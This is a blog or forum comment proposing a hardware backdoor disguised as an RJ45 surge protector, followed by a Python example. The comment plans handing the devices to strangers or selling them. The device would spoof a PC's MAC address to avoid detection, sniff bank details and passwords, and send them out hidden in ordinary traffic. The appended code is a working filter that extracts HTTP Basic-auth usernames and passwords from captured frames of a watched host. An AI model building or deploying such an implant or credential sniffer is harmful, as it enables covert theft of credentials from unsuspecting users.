Ethernet/RJ45 Surge Protector with Backdoor

After reading this:

Which looks like a prototype due to its size, I can see this as an interesting first step to onsite cracking of networks or home computers. What I envisage is a small surge protector that looks exactly like a normal surge protector with RJ45 outlets for protecting Ethernet cables. It would be plugged into the wall socket and look like it's doing nothing, just like a normal surge protector. But the onboard Linux system and built-in hub on the RJ45 ports can start monitoring the network, try to call “home”, then watch the network traffic and, when something interesting happens, forward that to the attacker. The hub wouldn't show a “link” status on any other Ethernet device until two Ethernet devices are plugged in. Otherwise it would be a dead giveaway if a link light shows up on the PC when plugged into the surge protector but not into the user's own hub/switch. Obviously this wouldn't be an issue if an attacker was doing the “installing”, but the benefit of this device is that you can ask someone to do it for you. It's the old physical Trojan Horse idea: give these to people on the street or even sell them! The customer takes it home, plugs it in, and no antivirus system is going to counteract it. Perfect!

Obviously the “call home” wouldn't want to show up on any network monitoring, so it would need to look like normal traffic. And it wouldn't want to show up on any router as another DHCP client, so it would need to spoof the MAC address of the device or PC connected to it and watch out for any packets destined to it and not to the device/PC plugged into it. That way there shouldn't be any new “devices” shown on the network, so no network monitor would pick it up. The call home should be a Google search or something normal, or a post on a well-known website that wouldn't normally be picked up due to the large amount of content on that site.

The next step would be to send “interesting” information like bank accounts, credit card numbers, or usernames and passwords. By keeping the filter simple, only looking for specific things, the amount of data that would need to be encrypted and sent to the attacker would be fairly small, again lessening the chance of the device being picked up. Encrypting the password information would mean that even if someone in the IT department grabbed the packet, they wouldn't think twice if it looked like a normal SSL transmission. Of course, one option is to use the client's SMTP server to send out an email with the passwords etc. attached and encrypted. Again, by doing something that looks perfectly normal, it wouldn't show up on any monitoring system. The key is to become part of the noise of the internet, not a spike of something different. But to be the noise, the surge protector must listen to the noise and emulate it.

Either way, it shows that it's almost impossible to keep your data and your network safe. There is always a way around something.

David Robinson
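The passive filtering stage the comment describes (look only at frames to or from the PC whose MAC address the device borrows, and keep just the few bytes that carry a credential, so there is little to send later) as an added example in Python. This is not code from the original post or from any real device. It assumes constructed MAC addresses, constructed IPv4/TCP frames carrying HTTP requests, and that an HTTP `Authorization: Basic` header is the “interesting thing” being filtered for; the call-home and encryption steps are deliberately not shown.

```python
import base64
import struct

# Constructed example addresses (assumptions, not from the original post).
PC_MAC = bytes.fromhex("001122334455")     # the PC plugged into the protector
GW_MAC = bytes.fromhex("66778899aabb")     # the LAN gateway
OTHER_MAC = bytes.fromhex("ccddeeff0011")  # an unrelated host on the same hub

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6


def ipv4_header(src, dst, proto, payload_len):
    """Minimal 20-byte IPv4 header; checksum left zero, which is fine for parsing."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, src, dst)


def tcp_header(sport, dport):
    """Minimal 20-byte TCP header: data offset 5, flags PSH|ACK."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)


def build_frame(src_mac, dst_mac, app_payload, dport=80):
    """Ethernet + IPv4 + TCP frame carrying app_payload (constructed test input)."""
    tcp = tcp_header(40000, dport) + app_payload
    ip = ipv4_header(bytes([10, 0, 0, 5]), bytes([93, 184, 216, 34]), PROTO_TCP, len(tcp))
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IPV4) + ip + tcp


def tcp_payload(frame):
    """Return (src_mac, dst_mac, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 14:
        return None
    dst_mac, src_mac = frame[:6], frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    if len(ip) < 20:
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != PROTO_TCP or len(ip) < ihl + 20:
        return None
    tcp = ip[ihl:total_len]
    data_off = (tcp[12] >> 4) * 4
    dport = struct.unpack("!H", tcp[2:4])[0]
    return src_mac, dst_mac, dport, tcp[data_off:]


def extract_basic_auth(payload):
    """Pull (user, password) out of an HTTP 'Authorization: Basic' header, if present."""
    for line in payload.split(b"\r\n"):
        if line.lower().startswith(b"authorization: basic "):
            token = line.split(b" ", 2)[2].strip()
            try:
                user, _, password = base64.b64decode(token, validate=True).decode().partition(":")
            except ValueError:  # bad base64 or non-UTF-8: not a usable credential
                return None
            return user, password
    return None


def filter_credentials(frames, watch_mac):
    """Inspect only frames to/from the watched PC; keep only the credential records."""
    found = []
    for frame in frames:
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src_mac, dst_mac, dport, payload = parsed
        if watch_mac not in (src_mac, dst_mac):
            continue  # some other host on the hub: leave its traffic alone
        if dport != 80:
            continue  # keep the filter simple: plain HTTP only
        creds = extract_basic_auth(payload)
        if creds:
            found.append({"user": creds[0], "password": creds[1], "dport": dport})
    return found


def sample_frames():
    """Constructed frames: a Basic-auth request from the PC, ordinary traffic from
    the PC, and the same Basic-auth request from a different host on the hub."""
    token = base64.b64encode(b"alice:s3cret").decode()
    login = (f"GET /account HTTP/1.1\r\nHost: bank.example\r\n"
             f"Authorization: Basic {token}\r\n\r\n").encode()
    plain = b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
    return [
        build_frame(PC_MAC, GW_MAC, login),
        build_frame(PC_MAC, GW_MAC, plain),
        build_frame(OTHER_MAC, GW_MAC, login),
    ]


if __name__ == "__main__":
    frames = sample_frames()
    hits = filter_credentials(frames, PC_MAC)
    print(f"{sum(map(len, frames))} bytes seen, {len(hits)} record(s) kept: {hits}")
```

Running it shows the point the comment makes about volume: a few hundred bytes of frames pass through, and only one short record survives the filter, while the third frame (the same login from a different host) is ignored because the device confines itself to the traffic of the MAC address it shares.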